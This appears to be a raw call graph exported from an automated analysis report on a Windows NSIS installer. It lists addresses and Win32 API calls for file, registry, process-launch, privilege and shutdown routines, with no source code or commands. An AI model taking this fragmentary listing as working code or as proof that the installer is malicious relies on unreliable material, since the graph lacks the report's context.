4142->4143 4144 401960 4143->4144 4145 402bac 17 API calls 4144->4145 4146 40196d 4145->4146 4147 402bce 17 API calls 4146->4147 4148 401984 lstrlenA 4147->4148 4149 401994 4148->4149 4150 4019d4 4149->4150 4154 4060c1 lstrcpynA 4149->4154 4152 4019c4 4152->4150 4153 4019c9 lstrlenA 4152->4153 4153->4150 4154->4152 4155 40515c 4156 405180 4155->4156 4157 40516c 4155->4157 4159 405188 IsWindowVisible 4156->4159 4165 40519f 4156->4165 4158 405172 4157->4158 4167 4051c9 4157->4167 4160 404191 SendMessageA 4158->4160 4161 405195 4159->4161 4159->4167 4163 40517c 4160->4163 4164 404a98 5 API calls 4161->4164 4162 4051ce CallWindowProcA 4162->4163 4164->4165 4165->4162 4166 404b18 4 API calls 4165->4166 4166->4167 4167->4162 4168 40275d 4169 402763 4168->4169 4170 402a5a 4169->4170 4171 40276b FindClose 4169->4171 4171->4170 4179 401a5e 4180 402bac 17 API calls 4179->4180 4181 401a67 4180->4181 4182 402bac 17 API calls 4181->4182 4183 401a0e 4182->4183 4184 4029de 4185 4064ca 5 API calls 4184->4185 4186 4029e5 4185->4186 4187 402bce 17 API calls 4186->4187 4188 4029ee 4187->4188 4190 402a2a 4188->4190 4194 406114 4188->4194 4191 4029fc 4191->4190 4198 4060fe 4191->4198 4195 40611f 4194->4195 4196 406142 IIDFromString 4195->4196 4197 40613b 4195->4197 4196->4191 4197->4191 4201 4060e3 WideCharToMultiByte 4198->4201 4200 402a1d CoTaskMemFree 4200->4190 4201->4200 4202 4027df 4203 402bce 17 API calls 4202->4203 4205 4027ed 4203->4205 4204 402803 4207 405c35 2 API calls 4204->4207 4205->4204 4206 402bce 17 API calls 4205->4206 4206->4204 4208 402809 4207->4208 4230 405c5a GetFileAttributesA CreateFileA 4208->4230 4210 402816 4211 402822 GlobalAlloc 4210->4211 4212 4028bf 4210->4212 4213 4028b6 CloseHandle 4211->4213 4214 40283b 4211->4214 4215 4028c7 DeleteFileA 4212->4215 4216 4028da 4212->4216 4213->4212 4231 4032ca SetFilePointer 4214->4231 4215->4216 4218 402841 4219 4032b4 ReadFile 4218->4219 4220 40284a GlobalAlloc 4219->4220 4221 402894 4220->4221 4222 40285a 4220->4222 4224 405d01 WriteFile 4221->4224 4223 4030d8 35 API calls 4222->4223 4229 402867 4223->4229 4225 4028a0 GlobalFree 4224->4225 4226 4030d8 35 API calls 4225->4226 4228 4028b3 4226->4228 4227 40288b GlobalFree 4227->4221 4228->4213 4229->4227 4230->4210 4231->4218 4232 4023e0 4233 402bce 17 API calls 4232->4233 4234 4023f1 4233->4234 4235 402bce 17 API calls 4234->4235 4236 4023fa 4235->4236 4237 402bce 17 API calls 4236->4237 4238 402404 GetPrivateProfileStringA 4237->4238 4239 4028e0 4240 402bac 17 API calls 4239->4240 4241 4028e6 4240->4241 4242 402925 4241->4242 4243 40290e 4241->4243 4250 4027bf 4241->4250 4244 40293f 4242->4244 4245 40292f 4242->4245 4246 402922 4243->4246 4247 402913 4243->4247 4249 406154 17 API calls 4244->4249 4248 402bac 17 API calls 4245->4248 4254 40601f wsprintfA 4246->4254 4253 4060c1 lstrcpynA 4247->4253 4248->4250 4249->4250 4253->4250 4254->4250 4255 401563 4256 4029a5 4255->4256 4259 40601f wsprintfA 4256->4259 4258 4029aa 4259->4258 4260 401b63 4261 402bce 17 API calls 4260->4261 4262 401b6a 4261->4262 4263 402bac 17 API calls 4262->4263 4264 401b73 wsprintfA 4263->4264 4265 402a5a 4264->4265 4266 401d65 4267 401d78 GetDlgItem 4266->4267 4268 401d6b 4266->4268 4270 401d72 4267->4270 4269 402bac 17 API calls 4268->4269 4269->4270 4271 401db9 GetClientRect LoadImageA SendMessageA 4270->4271 4272 402bce 17 API calls 4270->4272 4274 401e1a 4271->4274 4276 401e26 4271->4276 4272->4271 4275 401e1f DeleteObject 4274->4275 4274->4276 4275->4276 4277 40166a 4278 402bce 17 API calls 4277->4278 4279 401671 4278->4279 4280 402bce 17 API calls 4279->4280 4281 40167a 4280->4281 4282 402bce 17 API calls 4281->4282 4283 401683 MoveFileA 4282->4283 4284 401696 4283->4284 4290 40168f 4283->4290 4285 406435 2 API calls 4284->4285 4287 4022e2 4284->4287 4288 4016a5 4285->4288 4286 401423 24 API calls 4286->4287 4288->4287 4289 405ea0 36 API calls 4288->4289 4289->4290 4290->4286 4291 40216b 4292 402bce 17 API calls 4291->4292 4293 402172 4292->4293 4294 402bce 17 API calls 4293->4294 4295 40217c 4294->4295 4296 402bce 17 API calls 4295->4296 4297 402186 4296->4297 4298 402bce 17 API calls 4297->4298 4299 402193 4298->4299 4300 402bce 17 API calls 4299->4300 4301 40219d 4300->4301 4302 4021df CoCreateInstance 4301->4302 4303 402bce 17 API calls 4301->4303 4306 4021fe 4302->4306 4308 4022ac 4302->4308 4303->4302 4304 401423 24 API calls 4305 4022e2 4304->4305 4307 40228c MultiByteToWideChar 4306->4307 4306->4308 4307->4308 4308->4304 4308->4305 4309 4022eb 4310 402bce 17 API calls 4309->4310 4311 4022f1 4310->4311 4312 402bce 17 API calls 4311->4312 4313 4022fa 4312->4313 4314 402bce 17 API calls 4313->4314 4315 402303 4314->4315 4316 406435 2 API calls 4315->4316 4317 40230c 4316->4317 4318 402310 4317->4318 4319 40231d lstrlenA lstrlenA 4317->4319 4320 4051e8 24 API calls 4318->4320 4322 402318 4318->4322 4321 4051e8 24 API calls 4319->4321 4320->4322 4323 402359 SHFileOperationA 4321->4323 4323->4318 4323->4322 4324 40236d 4325 402374 4324->4325 4327 402387 4324->4327 4326 406154 17 API calls 4325->4326 4328 402381 4326->4328 4329 4057dd MessageBoxIndirectA 4328->4329 4329->4327 4330 40266d 4331 402bac 17 API calls 4330->4331 4336 402677 4331->4336 4332 4026e5 4333 405cd2 ReadFile 4333->4336 4334 4026e7 4339 40601f wsprintfA 4334->4339 4335 4026f7 4335->4332 4338 40270d SetFilePointer 4335->4338 4336->4332 4336->4333 4336->4334 4336->4335 4338->4332 4339->4332 4340 4019ed 4341 402bce 17 API calls 4340->4341 4342 4019f4 4341->4342 4343 402bce 17 API calls 4342->4343 4344 4019fd 4343->4344 4345 401a04 lstrcmpiA 4344->4345 4346 401a16 lstrcmpA 4344->4346 4347 401a0a 4345->4347 4346->4347 4348 40156f 4349 401586 4348->4349 4350 40157f ShowWindow 4348->4350 4351 401594 ShowWindow 4349->4351 4352 402a5a 4349->4352 4350->4349 4351->4352 3323 403c71 3324 403dc4 3323->3324 3325 403c89 3323->3325 3326 403dd5 GetDlgItem GetDlgItem 3324->3326 3335 403e15 3324->3335 3325->3324 3327 403c95 3325->3327 3328 404145 18 API calls 3326->3328 3330 403ca0 SetWindowPos 3327->3330 3331 403cb3 3327->3331 3334 403dff SetClassLongA 3328->3334 3329 403e6f 3336 404191 SendMessageA 3329->3336 3341 403dbf 3329->3341 3330->3331 3332 403cd0 3331->3332 3333 403cb8 ShowWindow 3331->3333 3337 403cf2 3332->3337 3338 403cd8 DestroyWindow 3332->3338 3333->3332 3339 40140b 2 API calls 3334->3339 3335->3329 3340 401389 2 API calls 3335->3340 3364 403e81 3336->3364 3343 403cf7 SetWindowLongA 3337->3343 3344 403d08 3337->3344 3342 4040ce 3338->3342 3339->3335 3345 403e47 3340->3345 3342->3341 3351 4040ff ShowWindow 3342->3351 3343->3341 3348 403db1 3344->3348 3349 403d14 GetDlgItem 3344->3349 3345->3329 3350 403e4b SendMessageA 3345->3350 3346 40140b 2 API calls 3346->3364 3347 4040d0 DestroyWindow EndDialog 3347->3342 3354 4041ac 8 API calls 3348->3354 3352 403d44 3349->3352 3353 403d27 SendMessageA IsWindowEnabled 3349->3353 3350->3341 3351->3341 3356 403d51 3352->3356 3359 403d98 SendMessageA 3352->3359 3360 403d64 3352->3360 3367 403d49 3352->3367 3353->3341 3353->3352 3354->3341 3355 406154 17 API calls 3355->3364 3356->3359 3356->3367 3357 40411e SendMessageA 3363 403d7f 3357->3363 3358 404145 18 API calls 3358->3364 3359->3348 3361 403d81 3360->3361 3362 403d6c 3360->3362 3366 40140b 2 API calls 3361->3366 3400 40140b 3362->3400 3363->3348 3364->3341 3364->3346 3364->3347 3364->3355 3364->3358 3369 404145 18 API calls 3364->3369 3385 404010 DestroyWindow 3364->3385 3368 403d88 3366->3368 3367->3357 3368->3348 3368->3367 3370 403efc GetDlgItem 3369->3370 3371 403f11 3370->3371 3372 403f19 ShowWindow KiUserCallbackDispatcher 3370->3372 3371->3372 3394 404167 KiUserCallbackDispatcher 3372->3394 3374 403f43 EnableWindow 3379 403f57 3374->3379 3375 403f5c GetSystemMenu EnableMenuItem SendMessageA 3376 403f8c SendMessageA 3375->3376 3375->3379 3376->3379 3379->3375 3395 40417a SendMessageA 3379->3395 3396 403c52 3379->3396 3399 4060c1 lstrcpynA 3379->3399 3381 403fbb lstrlenA 3382 406154 17 API calls 3381->3382 3383 403fcc SetWindowTextA 3382->3383 3384 401389 2 API calls 3383->3384 3384->3364 3385->3342 3386 40402a CreateDialogParamA 3385->3386 3386->3342 3387 40405d 3386->3387 3388 404145 18 API calls 3387->3388 3389 404068 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3388->3389 3390 401389 2 API calls 3389->3390 3391 4040ae 3390->3391 3391->3341 3392 4040b6 ShowWindow 3391->3392 3393 404191 SendMessageA 3392->3393 3393->3342 3394->3374 3395->3379 3397 406154 17 API calls 3396->3397 3398 403c60 SetWindowTextA 3397->3398 3398->3379 3399->3381 3401 401389 2 API calls 3400->3401 3402 401420 3401->3402 3402->3367 4360 4014f4 SetForegroundWindow 4361 402a5a 4360->4361 3819 402476 3820 402bce 17 API calls 3819->3820 3821 402488 3820->3821 3822 402bce 17 API calls 3821->3822 3823 402492 3822->3823 3836 402c5e 3823->3836 3826 402a5a 3827 4024c7 3829 4024d3 3827->3829 3832 402bac 17 API calls 3827->3832 3828 402bce 17 API calls 3831 4024c0 lstrlenA 3828->3831 3830 4024f5 RegSetValueExA 3829->3830 3833 4030d8 35 API calls 3829->3833 3834 40250b RegCloseKey 3830->3834 3831->3827 3832->3829 3833->3830 3834->3826 3837 402c79 3836->3837 3840 405f75 3837->3840 3841 405f84 3840->3841 3842 4024a2 3841->3842 3843 405f8f RegCreateKeyExA 3841->3843 3842->3826 3842->3827 3842->3828 3843->3842 4369 402777 4370 40277d 4369->4370 4371 402781 FindNextFileA 4370->4371 4373 402793 4370->4373 4372 4027d2 4371->4372 4371->4373 4375 4060c1 lstrcpynA 4372->4375 4375->4373 4376 401ef9 4377 402bce 17 API calls 4376->4377 4378 401eff 4377->4378 4379 402bce 17 API calls 4378->4379 4380 401f08 4379->4380 4381 402bce 17 API calls 4380->4381 4382 401f11 4381->4382 4383 402bce 17 API calls 4382->4383 4384 401f1a 4383->4384 4385 401423 24 API calls 4384->4385 4386 401f21 4385->4386 4393 4057a3 ShellExecuteExA 4386->4393 4388 401f5c 4389 40653f 5 API calls 4388->4389 4390 4027bf 4388->4390 4391 401f76 CloseHandle 4389->4391 4391->4390 4393->4388 3885 401f7b 3886 402bce 17 API calls 3885->3886 3887 401f81 3886->3887 3888 4051e8 24 API calls 3887->3888 3889 401f8b 3888->3889 3890 405760 2 API calls 3889->3890 3891 401f91 3890->3891 3892 401fb2 CloseHandle 3891->3892 3895 4027bf 3891->3895 3900 40653f WaitForSingleObject 3891->3900 3892->3895 3896 401fa6 3897 401fb4 3896->3897 3898 401fab 3896->3898 3897->3892 3905 40601f wsprintfA 3898->3905 3901 406559 3900->3901 3902 40656b GetExitCodeProcess 3901->3902 3903 406506 2 API calls 3901->3903 3902->3896 3904 406560 WaitForSingleObject 3903->3904 3904->3901 3905->3892 4394 40427b lstrcpynA lstrlenA 4402 401ffb 4403 402bce 17 API calls 4402->4403 4404 402002 4403->4404 4405 4064ca 5 API calls 4404->4405 4406 402011 4405->4406 4407 402029 GlobalAlloc 4406->4407 4412 402091 4406->4412 4408 40203d 4407->4408 4407->4412 4409 4064ca 5 API calls 4408->4409 4410 402044 4409->4410 4411 4064ca 5 API calls 4410->4411 4413 40204e 4411->4413 4413->4412 4417 40601f wsprintfA 4413->4417 4415 402085 4418 40601f wsprintfA 4415->4418 4417->4415 4418->4412 4419 4018fd 4420 401934 4419->4420 4421 402bce 17 API calls 4420->4421 4422 401939 4421->4422 4423 405889 67 API calls 4422->4423 4424 401942 4423->4424 4425 401000 4426 401037 BeginPaint GetClientRect 4425->4426 4427 40100c DefWindowProcA 4425->4427 4429 4010f3 4426->4429 4430 401179 4427->4430 4431 401073 CreateBrushIndirect FillRect DeleteObject 4429->4431 4432 4010fc 4429->4432 4431->4429 4433 401102 CreateFontIndirectA 4432->4433 4434 401167 EndPaint 4432->4434 4433->4434 4435 401112 6 API calls 4433->4435 4434->4430 4435->4434 4436 401900 4437 402bce 17 API calls 4436->4437 4438 401907 4437->4438 4439 4057dd MessageBoxIndirectA 4438->4439 4440 401910 4439->4440 4441 401502 4442 40150a 4441->4442 4444 40151d 4441->4444 4443 402bac 17 API calls 4442->4443 4443->4444 4445 402604 4446 402bce 17 API calls 4445->4446 4447 40260b 4446->4447 4450 405c5a GetFileAttributesA CreateFileA 4447->4450 4449 402617 4450->4449 4451 401b87 4452 401b94 4451->4452 4453 401bd8 4451->4453 4456 401c1c 4452->4456 4459 401bab 4452->4459 4454 401c01 GlobalAlloc 4453->4454 4455 401bdc 4453->4455 4458 406154 17 API calls 4454->4458 4467 402387 4455->4467 4472 4060c1 lstrcpynA 4455->4472 4457 406154 17 API calls 4456->4457 4456->4467 4460 402381 4457->4460 4458->4456 4470 4060c1 lstrcpynA 4459->4470 4465 4057dd MessageBoxIndirectA 4460->4465 4463 401bee GlobalFree 4463->4467 4464 401bba 4471 4060c1 lstrcpynA 4464->4471 4465->4467 4468 401bc9 4473 4060c1 lstrcpynA 4468->4473 4470->4464 4471->4468 4472->4463 4473->4467 3308 402588 3309 402c0e 17 API calls 3308->3309 3310 402592 3309->3310 3320 402bac 3310->3320 3312 40259b 3313 4025a9 3312->3313 3316 4027bf 3312->3316 3314 4025c2 RegEnumValueA 3313->3314 3315 4025b6 RegEnumKeyA 3313->3315 3317 4025de RegCloseKey 3314->3317 3318 4025d7 3314->3318 3315->3317 3317->3316 3318->3317 3321 406154 17 API calls 3320->3321 3322 402bc1 3321->3322 3322->3312 4481 404590 4482 4045a0 4481->4482 4483 4045c6 4481->4483 4484 404145 18 API calls 4482->4484 4485 4041ac 8 API calls 4483->4485 4486 4045ad SetDlgItemTextA 4484->4486 4487 4045d2 4485->4487 4486->4483 4488 401490 4489 4051e8 24 API calls 4488->4489 4490 401497 4489->4490 3403 403312 SetErrorMode GetVersion 3404 403353 3403->3404 3405 403359 3403->3405 3406 4064ca 5 API calls 3404->3406 3407 40645c 3 API calls 3405->3407 3406->3405 3408 40336f lstrlenA 3407->3408 3408->3405 3409 40337e 3408->3409 3410 4064ca 5 API calls 3409->3410 3411 403385 3410->3411 3412 4064ca 5 API calls 3411->3412 3413 40338c 3412->3413 3414 4064ca 5 API calls 3413->3414 3416 403398 #17 OleInitialize SHGetFileInfoA 3414->3416 3493 4060c1 lstrcpynA 3416->3493 3418 4033e4 GetCommandLineA 3494 4060c1 lstrcpynA 3418->3494 3420 4033f6 3421 405a84 CharNextA 3420->3421 3422 40341f CharNextA 3421->3422 3430 40342f 3422->3430 3423 4034f9 3424 40350c GetTempPathA 3423->3424 3495 4032e1 3424->3495 3426 403524 3427 403528 GetWindowsDirectoryA lstrcatA 3426->3427 3428 40357e DeleteFileA 3426->3428 3431 4032e1 12 API calls 3427->3431 3505 402ea1 GetTickCount GetModuleFileNameA 3428->3505 3429 405a84 CharNextA 3429->3430 3430->3423 3430->3429 3434 4034fb 3430->3434 3433 403544 3431->3433 3433->3428 3437 403548 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3433->3437 3589 4060c1 lstrcpynA 3434->3589 3435 403592 3438 403628 3435->3438 3439 403618 3435->3439 3443 405a84 CharNextA 3435->3443 3441 4032e1 12 API calls 3437->3441 3606 4037fa 3438->3606 3533 4038d4 3439->3533 3445 403576 3441->3445 3446 4035ad 3443->3446 3445->3428 3445->3438 3453 4035f3 3446->3453 3454 403658 3446->3454 3447 403760 3450 4037e2 ExitProcess 3447->3450 3451 403768 GetCurrentProcess OpenProcessToken 3447->3451 3448 403642 3613 4057dd 3448->3613 3456 4037b3 3451->3456 3457 403783 LookupPrivilegeValueA AdjustTokenPrivileges 3451->3457 3590 405b47 3453->3590 3617 405748 3454->3617 3460 4064ca 5 API calls 3456->3460 3457->3456 3463 4037ba 3460->3463 3466 4037cf ExitWindowsEx 3463->3466 3467 4037db 3463->3467 3464 403679 lstrcatA lstrcmpiA 3464->3438 3469 403695 3464->3469 3465 40366e lstrcatA 3465->3464 3466->3450 3466->3467 3470 40140b 2 API calls 3467->3470 3472 4036a1 3469->3472 3473 40369a 3469->3473 3470->3450 3471 40360d 3605 4060c1 lstrcpynA 3471->3605 3625 40572b CreateDirectoryA 3472->3625 3620 4056ae CreateDirectoryA 3473->3620 3478 4036a6 SetCurrentDirectoryA 3479 4036c0 3478->3479 3480 4036b5 3478->3480 3629 4060c1 lstrcpynA 3479->3629 3628 4060c1 lstrcpynA 3480->3628 3483 406154 17 API calls 3484 4036ff DeleteFileA 3483->3484 3485 40370c CopyFileA 3484->3485 3490 4036ce 3484->3490 3485->3490 3486 403754 3487 405ea0 36 API calls 3486->3487 3487->3438 3489 406154 17 API calls 3489->3490 3490->3483 3490->3486 3490->3489 3492 403740 CloseHandle 3490->3492 3630 405ea0 MoveFileExA 3490->3630 3634 405760 CreateProcessA 3490->3634 3492->3490 3493->3418 3494->3420 3496 40639c 5 API calls 3495->3496 3498 4032ed 3496->3498 3497 4032f7 3497->3426 3498->3497 3637 405a59 lstrlenA CharPrevA 3498->3637 3501 40572b 2 API calls 3502 403305 3501->3502 3503 405c89 2 API calls 3502->3503 3504 403310 3503->3504 3504->3426 3640 405c5a GetFileAttributesA CreateFileA 3505->3640 3507 402ee1 3531 402ef1 3507->3531 3641 4060c1 lstrcpynA 3507->3641 3509 402f07 3642 405aa0 lstrlenA 3509->3642 3513 402f18 GetFileSize 3528 403012 3513->3528 3532 402f2f 3513->3532 3515 40301b 3517 40304b GlobalAlloc 3515->3517 3515->3531 3683 4032ca SetFilePointer 3515->3683 3658 4032ca SetFilePointer 3517->3658 3518 40307e 3522 402e3d 6 API calls 3518->3522 3521 403066 3659 4030d8 3521->3659 3522->3531 3523 403034 3524 4032b4 ReadFile 3523->3524 3527 40303f 3524->3527 3526 402e3d 6 API calls 3526->3532 3527->3517 3527->3531 3647 402e3d 3528->3647 3529 403072 3529->3529 3530 4030af SetFilePointer 3529->3530 3529->3531 3530->3531 3531->3435 3532->3518 3532->3526 3532->3528 3532->3531 3680 4032b4 3532->3680 3534 4064ca 5 API calls 3533->3534 3535 4038e8 3534->3535 3536 403900 3535->3536 3537 4038ee 3535->3537 3538 405fa8 3 API calls 3536->3538 3708 40601f wsprintfA 3537->3708 3539 40392b 3538->3539 3540 403949 lstrcatA 3539->3540 3542 405fa8 3 API calls 3539->3542 3543 4038fe 3540->3543 3542->3540 3700 403b99 3543->3700 3546 405b47 18 API calls 3547 40397b 3546->3547 3548 403a04 3547->3548 3550 405fa8 3 API calls 3547->3550 3549 405b47 18 API calls 3548->3549 3551 403a0a 3549->3551 3552 4039a7 3550->3552 3553 403a1a LoadImageA 3551->3553 3556 406154 17 API calls 3551->3556 3552->3548 3559 4039c3 lstrlenA 3552->3559 3563 405a84 CharNextA 3552->3563 3554 403ac0 3553->3554 3555 403a41 RegisterClassA 3553->3555 3558 40140b 2 API calls 3554->3558 3557 403a77 SystemParametersInfoA CreateWindowExA 3555->3557 3588 403aca 3555->3588 3556->3553 3557->3554 3562 403ac6 3558->3562 3560 4039d1 lstrcmpiA 3559->3560 3561 4039f7 3559->3561 3560->3561 3565 4039e1 GetFileAttributesA 3560->3565 3566 405a59 3 API calls 3561->3566 3568 403b99 18 API calls 3562->3568 3562->3588 3564 4039c1 3563->3564 3564->3559 3567 4039ed 3565->3567 3569 4039fd 3566->3569 3567->3561 3570 405aa0 2 API calls 3567->3570 3571 403ad7 3568->3571 3709 4060c1 lstrcpynA 3569->3709 3570->3561 3573 403ae3 ShowWindow 3571->3573 3574 403b66 3571->3574 3576 40645c 3 API calls 3573->3576 3575 4052ba 5 API calls 3574->3575 3577 403b6c 3575->3577 3578 403afb 3576->3578 3579 403b70 3577->3579 3580 403b88 3577->3580 3581 403b09 GetClassInfoA 3578->3581 3585 40645c 3 API calls 3578->3585 3587 40140b 2 API calls 3579->3587 3579->3588 3584 40140b 2 API calls 3580->3584 3582 403b33 DialogBoxParamA 3581->3582 3583 403b1d GetClassInfoA RegisterClassA 3581->3583 3586 40140b 2 API calls 3582->3586 3583->3582 3584->3588 3585->3581 3586->3588 3587->3588 3588->3438 3589->3424 3711 4060c1 lstrcpynA 3590->3711 3592 405b58 3712 405af2 CharNextA CharNextA 3592->3712 3595 4035fe 3595->3438 3604 4060c1 lstrcpynA 3595->3604 3596 40639c 5 API calls 3602 405b6e 3596->3602 3597 405b99 lstrlenA 3598 405ba4 3597->3598 3597->3602 3599 405a59 3 API calls 3598->3599 3601 405ba9 GetFileAttributesA 3599->3601 3601->3595 3602->3595 3602->3597 3603 405aa0 2 API calls 3602->3603 3718 406435 FindFirstFileA 3602->3718 3603->3597 3604->3471 3605->3439 3607 403812 3606->3607 3608 403804 CloseHandle 3606->3608 3721 40383f 3607->3721 3608->3607 3614 4057f2 3613->3614 3615 403650 ExitProcess 3614->3615 3616 405806 MessageBoxIndirectA 3614->3616 3616->3615 3618 4064ca 5 API calls 3617->3618 3619 40365d lstrcatA 3618->3619 3619->3464 3619->3465 3621 40369f 3620->3621 3622 4056ff GetLastError 3620->3622 3621->3478 3622->3621 3623 40570e SetFileSecurityA 3622->3623 3623->3621 3624 405724 GetLastError 3623->3624 3624->3621 3626 40573b 3625->3626 3627 40573f GetLastError 3625->3627 3626->3478 3627->3626 3628->3479 3629->3490 3631 405eb4 3630->3631 3633 405ec1 3630->3633 3779 405d30 3631->3779 3633->3490 3635 405793 CloseHandle 3634->3635 3636 40579f 3634->3636 3635->3636 3636->3490 3638 405a73 lstrcatA 3637->3638 3639 4032ff 3637->3639 3638->3639 3639->3501 3640->3507 3641->3509 3643 405aad 3642->3643 3644 405ab2 CharPrevA 3643->3644 3645 402f0d 3643->3645 3644->3643 3644->3645 3646 4060c1 lstrcpynA 3645->3646 3646->3513 3648 402e46 3647->3648 3649 402e5e 3647->3649 3652 402e56 3648->3652 3653 402e4f DestroyWindow 3648->3653 3650 402e66 3649->3650 3651 402e6e GetTickCount 3649->3651 3684 406506 3650->3684 3655 402e7c CreateDialogParamA ShowWindow 3651->3655 3656 402e9f 3651->3656 3652->3515 3653->3652 3655->3656 3656->3515 3658->3521 3660 4030ee 3659->3660 3661 403119 3660->3661 3697 4032ca SetFilePointer 3660->3697 3663 4032b4 ReadFile 3661->3663 3664 403124 3663->3664 3665 403254 3664->3665 3666 403136 GetTickCount 3664->3666 3668 40323e 3664->3668 3667 403258 3665->3667 3672 403270 3665->3672 3677 403149 3666->3677 3669 4032b4 ReadFile 3667->3669 3668->3529 3669->3668 3670 4032b4 ReadFile 3670->3672 3671 4032b4 ReadFile 3671->3677 3672->3668 3672->3670 3673 405d01 WriteFile 3672->3673 3673->3672 3675 4031af GetTickCount 3675->3677 3676 4031d8 MulDiv wsprintfA 3678 4051e8 24 API calls 3676->3678 3677->3668 3677->3671 3677->3675 3677->3676 3688 40660f 3677->3688 3695 405d01 WriteFile 3677->3695 3678->3677 3698 405cd2 ReadFile 3680->3698 3683->3523 3685 406523 PeekMessageA 3684->3685 3686 402e6c 3685->3686 3687 406519 DispatchMessageA 3685->3687 3686->3515 3687->3685 3689 406634 3688->3689 3690 40663c 3688->3690 3689->3677 3690->3689 3691 4066c3 GlobalFree 3690->3691 3692 4066cc GlobalAlloc 3690->3692 3693 406743 GlobalAlloc 3690->3693 3694 40673a GlobalFree 3690->3694 3691->3692 3692->3689 3692->3690 3693->3689 3693->3690 3694->3693 3696 405d1f 3695->3696 3696->3677 3697->3661 3699 4032c7 3698->3699 3699->3532 3701 403bad 3700->3701 3710 40601f wsprintfA 3701->3710 3703 403c1e 3704 403c52 18 API calls 3703->3704 3706 403c23 3704->3706 3705 403959 3705->3546 3706->3705 3707 406154 17 API calls 3706->3707 3707->3706 3708->3543 3709->3548 3710->3703 3711->3592 3714 405b0d 3712->3714 3717 405b1d 3712->3717 3713 405b3d 3713->3595 3713->3596 3715 405b18 CharNextA 3714->3715 3714->3717 3715->3713 3716 405a84 CharNextA 3716->3717 3717->3713 3717->3716 3719 406456 3718->3719 3720 40644b FindClose 3718->3720 3719->3602 3720->3719 3722 40384d 3721->3722 3723 403817 3722->3723 3724 403852 FreeLibrary GlobalFree 3722->3724 3725 405889 3723->3725 3724->3723 3724->3724 3726 405b47 18 API calls 3725->3726 3727 4058a9 3726->3727 3728 4058b1 DeleteFileA 3727->3728 3729 4058c8 3727->3729 3730 403631 OleUninitialize 3728->3730 3731 405a00 3729->3731 3766 4060c1 lstrcpynA 3729->3766 3730->3447 3730->3448 3731->3730 3736 406435 2 API calls 3731->3736 3733 4058ee 3734 405901 3733->3734 3735 4058f4 lstrcatA 3733->3735 3738 405aa0 2 API calls 3734->3738 3737 405907 3735->3737 3739 405a1a 3736->3739 3740 405915 lstrcatA 3737->3740 3741 40590c 3737->3741 3738->3737 3739->3730 3742 405a1e 3739->3742 3743 405920 lstrlenA FindFirstFileA 3740->3743 3741->3740 3741->3743 3745 405a59 3 API calls 3742->3745 3744 4059f6 3743->3744 3762 405944 3743->3762 3744->3731 3747 405a24 3745->3747 3746 405a84 CharNextA 3746->3762 3748 405841 5 API calls 3747->3748 3749 405a30 3748->3749 3750 405a34 3749->3750 3751 405a4a 3749->3751 3750->3730 3756 4051e8 24 API calls 3750->3756 3752 4051e8 24 API calls 3751->3752 3752->3730 3753 4059d5 FindNextFileA 3755 4059ed FindClose 3753->3755 3753->3762 3755->3744 3757 405a41 3756->3757 3759 405ea0 36 API calls 3757->3759 3760 405a48 3759->3760 3760->3730 3761 405889 60 API calls 3761->3762 3762->3746 3762->3753 3762->3761 3763 4051e8 24 API calls 3762->3763 3764 4051e8 24 API calls 3762->3764 3765 405ea0 36 API calls 3762->3765 3767 4060c1 lstrcpynA 3762->3767 3768 405841 3762->3768 3763->3753 3764->3762 3765->3762 3766->3733 3767->3762 3776 405c35 GetFileAttributesA 3768->3776 3771 40586e 3771->3762 3772 405864 DeleteFileA 3774 40586a 3772->3774 3773 40585c RemoveDirectoryA 3773->3774 3774->3771 3775 40587a SetFileAttributesA 3774->3775 3775->3771 3777 40584d 3776->3777 3778 405c47 SetFileAttributesA 3776->3778 3777->3771 3777->3772 3777->3773 3778->3777 3780 405d56 3779->3780 3781 405d7c GetShortPathNameA 3779->3781 3806 405c5a GetFileAttributesA CreateFileA 3780->3806 3783 405d91 3781->3783 3784 405e9b 3781->3784 3783->3784 3786 405d99 wsprintfA 3783->3786 3784->3633 3785 405d60 CloseHandle GetShortPathNameA 3785->3784 3787 405d74 3785->3787 3788 406154 17 API calls 3786->3788 3787->3781 3787->3784 3789 405dc1 3788->3789 3807 405c5a GetFileAttributesA CreateFileA 3789->3807 3791 405dce 3791->3784 3792 405ddd GetFileSize GlobalAlloc 3791->3792 3793 405e94 CloseHandle 3792->3793 3794 405dff 3792->3794 3793->3784 3795 405cd2 ReadFile 3794->3795 3796 405e07 3795->3796 3796->3793 3808 405bbf lstrlenA 3796->3808 3799 405e32 3801 405bbf 4 API calls 3799->3801 3800 405e1e lstrcpyA 3802 405e40 3800->3802 3801->3802 3803 405e77 SetFilePointer 3802->3803 3804 405d01 WriteFile 3803->3804 3805 405e8d GlobalFree 3804->3805 3805->3793 3806->3785 3807->3791 3809 405c00 lstrlenA 3808->3809 3810 405c08 3809->3810 3811 405bd9 lstrcmpiA 3809->3811 3810->3799 3810->3800 3811->3810 3812 405bf7 CharNextA 3811->3812 3812->3809 4491 403892 4492 40389d 4491->4492 4493 4038a1 4492->4493 4494 4038a4 GlobalAlloc 4492->4494 4494->4493 4495 402516 4496 402c0e 17 API calls 4495->4496 4497 402520 4496->4497 4498 402bce 17 API calls 4497->4498 4499 402529 4498->4499 4500 402533 RegQueryValueExA 4499->4500 4504 4027bf 4499->4504 4501 402559 RegCloseKey 4500->4501 4502 402553 4500->4502 4501->4504 4502->4501 4506 40601f wsprintfA 4502->4506 4506->4501 4507 40239c 4508 4023a4 4507->4508 4509 4023aa 4507->4509 4510 402bce 17 API calls 4508->4510 4511 402bce 17 API calls 4509->4511 4512 4023ba 4509->4512 4510->4509 4511->4512 4513 4023c8 4512->4513 4514 402bce 17 API calls 4512->4514 4515 402bce 17 API calls 4513->4515 4514->4513 4516 4023d1 WritePrivateProfileStringA 4515->4516 3929 40209d 3930 40215d 3929->3930 3931 4020af 3929->3931 3933 401423 24 API calls 3930->3933 3932 402bce 17 API calls 3931->3932 3934 4020b6 3932->3934 3940 4022e2 3933->3940 3935 402bce 17 API calls 3934->3935 3936 4020bf 3935->3936 3937 4020d4 LoadLibraryExA 3936->3937 3938 4020c7 GetModuleHandleA 3936->3938 3937->3930 3939 4020e4 GetProcAddress 3937->3939 3938->3937 3938->3939 3941 402130 3939->3941 3942 4020f3 3939->3942 3943 4051e8 24 API calls 3941->3943 3944 401423 24 API calls 3942->3944 3945 402103 3942->3945 3943->3945 3944->3945 3945->3940 3946 402151 FreeLibrary 3945->3946 3946->3940 3947 40159d 3948 402bce 17 API calls 3947->3948 3949 4015a4 